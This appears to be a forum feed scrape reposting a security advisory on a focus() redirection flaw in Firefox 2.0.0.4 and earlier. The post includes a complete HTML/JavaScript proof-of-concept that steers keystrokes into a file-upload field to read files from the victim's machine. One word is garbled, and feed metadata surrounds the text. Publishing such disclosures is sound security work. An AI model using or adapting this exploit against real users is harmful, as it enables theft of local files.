<![CDATA[Latest posts for the topic "Mozilla Firefox focus() Redirection Vulnerability"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Mozilla Firefox focus() Redirection Vulnerability Mozilla Firefox focus() Redirection Vulnerability ------------------------------------------------------------------------ SUMMARY A vulnerability in Mozilla Firefox allows the attacker to silently wwwect focus of selected key press events to an otherwise protected file upload form field. This is possible because of how onKeyDown event is handled, allowing the focus to be moved between the two. This enables the attacker to read arbitrary files on victim's system. DETAILS Vulnerable Systems: * Mozilla Firefox version 2.0.0.4 and prior Exploit: Code:
<html>
<body>
<script>
function restore()
{
 
document.getElementById("text1").value=document.getElementById("file1").value;
 document.getElementById("text1").focus();
}

function doKeyDown()
{
 document.getElementById("label1").focus();
}
</script>

<input type="file" id="file1" name="file1" onkeydown="restore();" 
onkeyup="restore()" />
<label for="file1" id="label1" name="label1"></label>
<br>
<textarea name="text1" id="text1" onkeydown="doKeyDown()">
</textarea>
</body>
</html>
ADDITIONAL INFORMATION The information has been provided by <mailto:hardwick.carl@gmail.com> carl hardwick. The original article can be found at: http://yathong.googlepages.com/FirefoxFocusBug.html ]]> /hvaonline/posts/list/11931.html#69057 /hvaonline/posts/list/11931.html#69057 GMT Mozilla Firefox focus() Redirection Vulnerability /hvaonline/posts/list/11931.html#69084 /hvaonline/posts/list/11931.html#69084 GMT Mozilla Firefox focus() Redirection Vulnerability /hvaonline/posts/list/11931.html#69086 /hvaonline/posts/list/11931.html#69086 GMT